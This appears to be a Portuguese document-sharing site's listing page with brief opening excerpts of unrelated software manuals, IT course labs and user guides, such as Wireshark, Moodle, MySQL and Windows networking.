( ) Prova ( ) Prova Semestral ( ) Exercícios ( ) Prova Modular ( ) Segunda Chamada ( ) Exame Final ( ) Prática de Laboratório ( ) Aproveitamento Extraordinário de Estudos Nota: Disciplina: Turma: Aluno
Leia maisManual de Utilização do PDV Klavix
Manual de Utilização do PDV Klavix Página 1/20 Instalando a partir do CD Se você recebeu um CD de instalação, rode o programa Instalador que se encontra no raiz do seu CD. Ele vai criar a pasta c:\loureiro
Leia maisRedes Ponto a Ponto. Os drivers das placas de rede devem estar instalados.
Redes Ponto a Ponto É fácil configurar uma rede ponto-a-ponto em qualquer versão do Windows. Antes entretanto é preciso tomar algumas providências em relação ao hardware: Todos os computadores devem estar
Leia maisComposição de Layout no Spring
UNIVERSIDADE FEDERAL DE MINAS GERAIS INSTITUTO DE GEOCIÊNCIAS DEPARTAMENTO DE CARTOGRAFIA Laboratório de Geoprocessamento Grazielle Anjos Carvalho Vladimir Diniz Vieira Ramos Belo Horizonte, 2007 CRIAÇÃO
Leia maisFigura 1: tela inicial do BlueControl COMO COLOCAR A SALA DE INFORMÁTICA EM FUNCIONAMENTO?
Índice BlueControl... 3 1 - Efetuando o logon no Windows... 4 2 - Efetuando o login no BlueControl... 5 3 - A grade de horários... 9 3.1 - Trabalhando com o calendário... 9 3.2 - Cancelando uma atividade
Leia maisInsight Teacher Quickstart Guide
1 2 Site de Internet: www.faronics.com E-mail: sales@faronics.com Telefone: (+1) 800-943-6422 ou (+1) 604-637-3333 Fax: (+1) 800-943-6488 ou (+1) 604-637-8188 Horário: de segunda-feira a sexta-feira, das
Leia maisMANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas.
MANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas. INDÍCE 1. Características gerais 2. Guia rápido de instalação 3. Processo de instalação 4. Opções avançadas de
Leia maisWireshark Lab: Iniciando
Wireshark Lab: Iniciando Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2008 BATISTA, O. M. N. Tradução e adaptação para Wireshark. Conte-me e esqueço. Mostre-me e eu lembro. Envolva-me
Leia maisConfigurações das notificações do sistema. Mike McBride Tradução: Lisiane Sztoltz
Configurações das notificações do sistema Mike McBride Tradução: Lisiane Sztoltz 2 Conteúdo 1 Configurações das notificações do sistema 4 1.1 Aplicativos.......................................... 4 1.1.1
Leia mais1. REGISTRO DE PROJETOS
1. REGISTRO DE PROJETOS Nesta aplicação será feito o registro dos projetos/ ações de extensão, informando os dados iniciais do projeto, as classificações cabíveis, os participantes, a definição da região
Leia maisVeja em Tela cheia abaixo: Página nº 2
Neste pequeno manual iremos conhecer as diversas impressoras que poderemos utilizar no sistema park service, a impressora poderá ser matricial ou térmica utilizando uma bobina de papel 40 colunas, facilmente
Leia maisPadrão ix. Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos. Versão 1.0.1.0
Padrão ix Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos Versão 1.0.1.0 Copyright 2000-2013 Padrão ix Sistemas Abertos Ltda. Todos os direitos reservados. As informações contidas
Leia maisOpenOffice Calc Aula 4
OpenOffice Calc Aula 4 Objetivos: Apresentar a criação de um gráfico no CALC, a partir dos dados em uma planilha Apresentar os diversos tipos de gráficos e suas aplicações (gráfico de coluna, de linha,
Leia maisCurso de Informática Básica
Curso de Informática Básica A Web Descomplique 1 Curso de Informática Básica Índice Introdução...3 Organizando os favoritos...3 Localizando Informações na página...5 Histórico de Navegação...7 Capturando
Leia maisLINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) 2823-8800 SÃO CAETANO DO SUL SÃO PAULO CEP: 09530-250
LINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) 2823-8800 SÃO CAETANO DO SUL SÃO PAULO CEP: 09530-250 1 SOFTWARE HCS 2005 - VERSÃO 4.5 (Compatível com Guarita Vr4.03 ou superior) Recomendações Iniciais Para
Leia maisCÓPIA E EXPORTAÇÃO DE SALA
CÓPIA E EXPORTAÇÃO DE SALA Você sabia? No Blackboard, é possível reutilizar os conteúdos de uma maneira prática, adaptando as estruturas e materiais existentes. Você pode copiar o conteúdo de uma disciplina
Leia maisManual Rápido de Registro e Configuração do DJPDV
Página 1 Manual Rápido de Registro e Configuração do DJPDV Juliana Rodrigues Prado Tamizou www.djsystem.com.br (15) 3324-3333 Rua Coronel Aureliano de Camargo,973 Centro - Tatuí SP - 18270-170 Revisado
Leia maisFileMaker Pro 13. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13
FileMaker Pro 13 Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13 2007-2013 FileMaker Inc. Todos os direitos reservados. FileMaker Inc. 5201 Patrick Henry Drive Santa Clara,
Leia maisIntrodução ao icare 2
Introdução ao icare 2 (Instrumentação para a Coleta Assistida de Resíduos Recicláveis V.2) Arthur Elídio da Silva Lucas Zenaro José Tarcísio F. de Camargo Unipinhal (2015) SUMÁRIO 1. INTRODUÇÃO... 3 O
Leia maisUNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA. Manual do Moodle- Sala virtual
UNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA Manual do Moodle- Sala virtual UNIFAP MACAPÁ-AP 2012 S U M Á R I O 1 Tela de Login...3 2 Tela Meus
Leia maisConfigurando um Grupo Doméstico e Compartilhando arquivos no Windows 7
Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7 Para criar um grupo doméstico e compartilhar arquivos é necessário que tenhamos pelo menos dois computadores ligados entre si (em
Leia maisMANUAL DE CONFIGURAÇÃO
MANUAL DE CONFIGURAÇÃO Índice Conteúdo Página Legendas 3 1.0 Primeiro acesso 5 2.0 Cadastro de login e senha 6 3.0 Configuração do Blocker 7 3.1 Senha de acesso 8 3.2 Grade de Horário 9 3.2.1 Configurando
Leia maisOFICINA DE POWER POINT
OFICINA DE POWER POINT Barra de Ferramentas Padrão Barra de Ferramentas Formatação Barra de Menus Modos de Visualização Painéis de Tarefas Barra de Ferramentas Desenho Profª. Maria Adelina Raupp Sganzerla
Leia maisUnidade 3: Personalizando o Excel *
Unidade 3: Personalizando o Excel * material do 2010* 3.0 Introdução Visto que você está fazendo este curso, você provavelmente passa ou espera passar muito tempo trabalhando com o Excel. Assim, você precisa
Leia maisManual de Orientação para Acesso e Uso do SARA Versão ERA s
Manual de Orientação para Acesso e Uso do SARA Versão ERA s 1. Introdução O SARA foi elaborado visando facilitar o dia a dia do produtor, foi desenvolvido em Delphi, utilizando banco de dados Firebird,
Leia maisVERSÃO: 1.3 TÍTULO: GUIA DE INÍCIO RÁPIDO CLIENTE: FUNCEF
Objetivo: Esse guia tem por objetivo auxiliar a instalação e configuração dos dispositivos a serem utilizados para monitoramento com o Olho Digital. Os acessos poderão ser feitos de 3 maneiras: 1- Por
Leia maisSeja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1!
Olá participante, Seja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1 Este documento é longo e importante. Por isso, pedimos, por gentileza, que você leiao até o final e siga atentamente
Leia maisTerminal de Consulta de Preço. Linha Vader. Modelo TT300 e TT1000i
Terminal de Consulta de Preço Linha Vader Modelo TT300 e TT1000i Índice 1. Conhecendo o Terminal de Consulta 03 1.1 Configurando o endereço IP no terminal 04 2. Conhecendo o Software TTSocket 06 3. Instalando
Leia maisLABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER 14.04.1 PELO VIRTUALBOX
LABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER 14.04.1 PELO VIRTUALBOX Procure no MENU INICIAR PROGRAMAS o ícone do VirtualBox e execute-o. Em seguida clique
Leia maisProfessor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede
Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede O servidor de arquivos fornece um ponto centralizado na rede para armazenamento e compartilhamento de arquivos entre os usuários. Quando
Leia maisConfigurando o Controle dos Pais no Windows Vista
Autor: Bruno Leonardo MCP, MCDST, MCSA http://brunoleonardoleal.spaces.live.com 24/06/2007 Configurando o Controle dos Pais no Windows Vista Página 1 de 16 O Controle dos Pais está disponível nas versões
Leia maisManual de Utilizador. Caderno. Recursos da Unidade Curricular. Gabinete de Ensino à Distância do IPP. http://eweb.ipportalegre.pt. ged@ipportalegre.
Manual de Utilizador Caderno Recursos da Unidade Curricular Gabinete de Ensino à Distância do IPP http://eweb.ipportalegre.pt ged@ipportalegre.pt Índice RECURSOS... 1 ADICIONAR E CONFIGURAR RECURSOS...
Leia maisSimulador PMP - 4º Edição Exame de Certificação do PMI
Simulador PMP - 4º Edição Exame de Certificação do PMI WWW.ASASSOFTWARES.COM.BR Índice 1 Informações Básicas... 1 1.1 Sair da aplicação... 1 1.2 Testar aplicação... 1 1.3 Licenciando a aplicação... 1 1.4
Leia maisMÓDULO DE MATRICULA UNASUS
MÓDULO DE MATRICULA UNASUS Guia de Instalação e Configuração (Moodle 2.x) Resumo Este documento lista o fluxo para aquisição do modulo de matricula, geração de chaves para acesso ao webservice do Arouca
Leia maisPara o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.
OPENOFFICE IMPRESS 1. O QUE É UMA APRESENTAÇÃO Para o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. Em cada slide podemos ter vários elementos
Leia maisManual do Software Pctel Supervisor Desktop
Manual do Software Pctel Supervisor Desktop Conteúdo O que é o Pctel Supervisor Desktop?...03 O que é usuário do canal (PA)?...03 Como cadastrar usuário do canal (PA)?...04 Como remover um usuário do canal?...05
Leia maisGuia do Usuário. idocs Content Server v.2.0-1 -
Guia do Usuário idocs Content Server v.2.0-1 - 2013 BBPaper_Ds - 2 - Sumário Introdução... 4 Inicializando a aplicação... 6 Ambiente... 7 Alterando o ambiente... 8 Senhas... 10 Alterando senhas... 10 Elementos
Leia maisCADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário
CADERNO DE INFORMÁTICA FACITA Faculdade de Itápolis Aplicativos Editores de Texto WORD 2007/2010 Sumário Editor de texto... 3 Iniciando Microsoft Word... 4 Fichários:... 4 Atalhos... 5 Área de Trabalho:
Leia maisUsando o do-file editor Automatizando o Stata
Usando o do-file editor Automatizando o Stata 1 O QUE É O EDITOR DE DO-FILE O Stata vem com um editor de texto integrado, o do-file editor (editor de do-files, em português), que pode ser usado para executar
Leia maisGuia de Usuário do Servidor do Avigilon Control Center. Versão 5.6
Guia de Usuário do Servidor do Avigilon Control Center Versão 5.6 2006-2015 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedida por escrito, nenhuma licença será
Leia maisNeste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One.
Neste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One. 1 Ao final deste tópico, você estará apto a: Descrever as funções de segurança fornecidas pelo System Landscape
Leia maisNeste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One.
Neste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One. 1 Neste tópico, você aprenderá a usar a ferramenta Quick Copy durante um projeto de implementação.
Leia maisGuia do Usuário do Aplicativo Desktop Client
Guia do Usuário do Aplicativo Desktop Client Versão 6 20/08/2010 OAISYS 7965 S. Priest Drive, Suite 105 Tempe, AZ 85284 (480) 496-9040 Guia do Usuário do Aplicativo OAISYS Desktop Client 1 Instalação Navegue
Leia maisManual Banco de dados MySQL
Manual Banco de dados MySQL Introdução Serão apresentadas neste manual, as operações envolvendo uma conversão com banco de dados MySQL. Incluindo a devida forma de criar e restaurar um backup, de ter acesso
Leia maisManual do Teclado de Satisfação Online WebOpinião
Manual do Teclado de Satisfação Online WebOpinião Versão 1.2.3 27 de novembro de 2015 Departamento de Engenharia de Produto (DENP) SEAT Sistemas Eletrônicos de Atendimento 1. Introdução O Teclado de Satisfação
Leia maisManual de Utilização
Manual de Utilização Versão 3.10 Sumário 1 Funções do Emissor... 3 1.1 Aba Inicial... 4 1.2 Aba Sistema... 5 1.2.1 Mensagem Sistema... 5 1.2.2 Extras... 6 1.2.3 Contingência... 6 1.2.4 Execução... 7 1.3
Leia maisGESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1)
GESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1) MICROSOFT OUTLOOK 2003 - OBJECTIVOS OBJECTIVOS: Enumerar as principais funcionalidades do Outlook; Demonstrar a utilização das ferramentas do correio electrónico;
Leia maisGravando Dados e Cópias de CD s com o Nero 6.0 Disciplina Operação de Sistemas Aplicativos I
CENTRO ESTADUAL DE EDUCAÇÃO TECNOLÓGICA PAULA SOUZA Escola Técnica Estadual de Avaré ETE-AVARÉ CURSO DE TÉCNICO EM INFORMÁTICA NÚCLEO DE APOIO Gravando Dados e Cópias de CD s com o Nero 6.0 Disciplina
Leia maisROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1
ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1 Informações importantes sobre a emissão do Certificado A1: 1. Todos os certificados do tipo A1 emitidos no computador/usuário são gerados em um único Repositório
Leia maisNOTA: A calibração instrumentada não é compatível com a KODAK Photo Printer 6800/6850 e a KODAK Photo Printer 605.
Arquivo LeiaMe para o Aplicativo de calibração da KODAK Photo Printer Novembro de 2011 Introdução Bem-vindo ao Aplicativo de calibração da KODAK Photo Printer para WINDOWS, uma ferramenta para calibrar
Leia mais